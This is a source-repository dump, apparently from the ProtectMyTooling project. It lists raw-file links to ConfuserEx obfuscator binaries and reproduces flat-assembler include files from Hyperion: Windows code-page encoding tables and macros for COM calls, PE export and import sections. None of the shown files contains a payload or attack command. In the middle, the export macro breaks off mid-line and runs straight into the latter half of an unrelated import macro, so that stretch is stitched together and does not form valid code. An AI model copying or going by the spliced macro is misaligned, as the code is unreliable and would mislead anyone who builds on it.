--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Core.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Core.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.DynCipher.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.DynCipher.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Protections.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Protections.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Renamer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Renamer.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.Runtime.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Confuser.Runtime.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/ConfuserEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/ConfuserEx.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/ConfuserEx.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Extras.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Extras.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Platform.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.Platform.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/GalaSoft.MvvmLight.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/GalaSoft.MvvmLight.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.amd64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.amd64.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.DiaSymReader.Native.x86.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Microsoft.Win32.Registry.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Microsoft.Win32.Registry.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/NDesk.Options.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Ookii.Dialogs.Wpf.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/Ookii.Dialogs.Wpf.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.IO.FileSystem.Primitives.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.IO.FileSystem.Primitives.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.IO.Packaging.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.IO.Packaging.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Security.AccessControl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Security.AccessControl.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Security.Principal.Windows.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Security.Principal.Windows.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.ValueTuple.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.ValueTuple.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/System.Windows.Interactivity.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/System.Windows.Interactivity.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/dnlib.dll
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/API/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls
3 |
4 | import comdlg32,\
5 | ChooseColorA,'ChooseColorA',\
6 | ChooseColorW,'ChooseColorW',\
7 | ChooseFontA,'ChooseFontA',\
8 | ChooseFontW,'ChooseFontW',\
9 | CommDlgExtendedError,'CommDlgExtendedError',\
10 | FindTextA,'FindTextA',\
11 | FindTextW,'FindTextW',\
12 | FormatCharDlgProc,'FormatCharDlgProc',\
13 | GetFileTitleA,'GetFileTitleA',\
14 | GetFileTitleW,'GetFileTitleW',\
15 | GetOpenFileNameA,'GetOpenFileNameA',\
16 | GetOpenFileNameW,'GetOpenFileNameW',\
17 | GetSaveFileNameA,'GetSaveFileNameA',\
18 | GetSaveFileNameW,'GetSaveFileNameW',\
19 | LoadAlterBitmap,'LoadAlterBitmap',\
20 | PageSetupDlgA,'PageSetupDlgA',\
21 | PageSetupDlgW,'PageSetupDlgW',\
22 | PrintDlgA,'PrintDlgA',\
23 | PrintDlgW,'PrintDlgW',\
24 | ReplaceTextA,'ReplaceTextA',\
25 | ReplaceTextW,'ReplaceTextW',\
26 | WantArrows,'WantArrows',\
27 | dwLBSubclass,'dwLBSubclass',\
28 | dwOKSubclass,'dwOKSubclass'
29 |
30 | api ChooseColor,\
31 | ChooseFont,\
32 | FindText,\
33 | GetFileTitle,\
34 | GetOpenFileName,\
35 | GetSaveFileName,\
36 | PageSetupDlg,\
37 | PrintDlg,\
38 | ReplaceText
39 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1250.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1250
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
12 | dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
13 | dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
14 | dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
15 | dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
16 | dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
17 | dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1251.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1251
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
11 | dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
12 | dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
13 | dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
14 | times 40h dw 410h+%-1
15 | end virtual
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1252.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1252
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
12 | times 60h dw 0A0h+%-1
13 | end virtual
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1253.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1253
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
13 | dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
14 | times 40h dw 390h+%-1
15 | end virtual
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1254.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1254
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
12 | times 30h dw 0A0h+%-1
13 | dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
14 | times 10h dw 0E0h+%-1
15 | dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
16 | end virtual
17 |
18 | macro du [arg]
19 | { local offset,char
20 | offset = $-$$
21 | du arg
22 | if arg eqtype ''
23 | repeat ($-offset-$$)/2
24 | load char byte from $$+offset+(%-1)*2
25 | if char > 7Fh
26 | load char word from __encoding:char*2
27 | store word char at $$+offset+(%-1)*2
28 | end if
29 | end repeat
30 | end if }
31 |
32 | struc du [args]
33 | { common label . word
34 | du args }
35 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1255.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1255
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
15 | dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
16 | dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
17 | dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1256.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1256
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
11 | dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
12 | dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
15 | dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
16 | dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
17 | dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1257.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1257
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
12 | dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
14 | dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
15 | dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
16 | dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
17 | dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN1258.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1258
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
12 | dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
15 | dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
16 | dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
17 | dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/ENCODING/WIN874.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 874
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
12 | times 60h dw 0E00h+%-1
13 | end virtual
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/COM32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg]
5 | { common
6 | if ~ arg eq
7 | reverse
8 | pushd arg
9 | common
10 | end if
11 | assert defined object#.com.object ; must be a COM object
12 | mov eax,[object]
13 | push eax
14 | mov eax,[eax]
15 | call [eax+object#.#proc] }
16 |
17 | macro comcall handle,interface,proc,[arg]
18 | { common
19 | if ~ arg eq
20 | reverse
21 | pushd arg
22 | common
23 | end if
24 | assert defined interface#.com.interface ; must be a COM interface
25 | if handle eqtype eax | handle eqtype 0
26 | push handle
27 | local ..handle
28 | label ..handle at handle
29 | mov eax,[..handle]
30 | else
31 | mov eax,handle
32 | push eax
33 | mov eax,[eax]
34 | end if
35 | call [eax+interface#.#proc] }
36 |
37 | macro interface name,[proc]
38 | { common
39 | struc name \{
40 | match , @struct \\{ define field@struct .,name, \\}
41 | match no, @struct \\{ . dd ?
42 | virtual at 0
43 | forward
44 | .#proc dd ?
45 | common
46 | .\#\\.com.object = name#.com.interface
47 | end virtual \\} \}
48 | virtual at 0
49 | forward
50 | name#.#proc dd ?
51 | common
52 | name#.com.interface = $ shr 2
53 | end virtual }
54 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/COM64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg]
5 | { common
6 | assert defined object#.com.object ; must be a COM object
7 | macro call dummy
8 | \{ mov rax,[object]
9 | mov rax,[rax]
10 | call [rax+object#.#proc] \}
11 | fastcall ,[object],arg
12 | purge call }
13 |
14 | macro comcall handle,interface,proc,[arg]
15 | { common
16 | assert defined interface#.com.interface ; must be a COM interface
17 | macro call dummy
18 | \{ if handle eqtype rax | handle eqtype 0
19 | local ..handle
20 | label ..handle at handle
21 | mov rax,[..handle]
22 | else
23 | mov rax,handle
24 | mov rax,[rax]
25 | end if
26 | call [rax+interface#.#proc] \}
27 | fastcall ,handle,arg
28 | purge call }
29 |
30 | macro interface name,[proc]
31 | { common
32 | struc name \{
33 | match , @struct \\{ define field@struct .,name, \\}
34 | match no, @struct \\{ . dq ?
35 | virtual at 0
36 | forward
37 | .#proc dq ?
38 | common
39 | .\#\\.com.object = name#.com.interface
40 | end virtual \\} \}
41 | virtual at 0
42 | forward
43 | name#.#proc dq ?
44 | common
45 | name#.com.interface = $ shr 3
46 | end virtual }
47 |
48 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/EXPORT.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstruction for making export section
3 |
4 | macro export dllname,[label,string]
5 | { common
6 | local module,addresses,names,ordinal,count
7 | count = 0
8 | forward
9 | count = count+1
10 | common
11 | dd 0,0,0,RVA module,1
12 | dd count,count,RVA addresses,RVA names,RVA ordinal
13 | addresses:
14 | forward
15 | dd RVA label
16 | common
17 | names:
18 | forward
19 | local name
20 | dd RVA name
21 | common
22 | ordinal: count = 0
23 | forward
24 | dw count
25 | count = count+1
26 | common
27 | module db dllname,0
28 | forward
29 | name db string,0
30 | common
31 | local x,y,z,str1,str2,v1,v2
32 | x = count shr 1
33 | while x > 0
34 | y = x
35 | while y < count
36 | z = y
37 | while z-x >= 0
38 | load v1 dword from names+z*4
39 | str1=($-RVA $)+v1
40 | load v2 dword from names+(z-x)*4
41 | str2=($-RVA $)+v2
42 | while v1 > 0
43 | load v1 from str1+%-1
44 | load v2 from str2+%-1
45 | if v1 <> v2
46 | break
47 | end if
48 | end while
49 | if v1 name#.lookup
41 | name#.redundant = 0
42 | dd 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dd RVA _label
51 | else
52 | label dd 80000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dd 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/IMPORT64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for making import section (64-bit)
3 |
4 | macro library [name,string]
5 | { common
6 | import.data:
7 | forward
8 | local _label
9 | if defined name#.redundant
10 | if ~ name#.redundant
11 | dd RVA name#.lookup,0,0,RVA _label,RVA name#.address
12 | end if
13 | end if
14 | name#.referred = 1
15 | common
16 | dd 0,0,0,0,0
17 | forward
18 | if defined name#.redundant
19 | if ~ name#.redundant
20 | _label db string,0
21 | rb RVA $ and 1
22 | end if
23 | end if }
24 |
25 | macro import name,[label,string]
26 | { common
27 | rb (- rva $) and 7
28 | if defined name#.referred
29 | name#.lookup:
30 | forward
31 | if used label
32 | if string eqtype ''
33 | local _label
34 | dq RVA _label
35 | else
36 | dq 8000000000000000h + string
37 | end if
38 | end if
39 | common
40 | if $ > name#.lookup
41 | name#.redundant = 0
42 | dq 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dq RVA _label
51 | else
52 | label dq 8000000000000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dq 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/MASM.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Simulate MASM's syntax
3 |
4 | struc struct
5 | { struct .
6 | name@struct equ . }
7 |
8 | struc ends
9 | { match =.,name@struct \{ ends \} }
10 |
11 | struc proc [params]
12 | { common define@proc .,
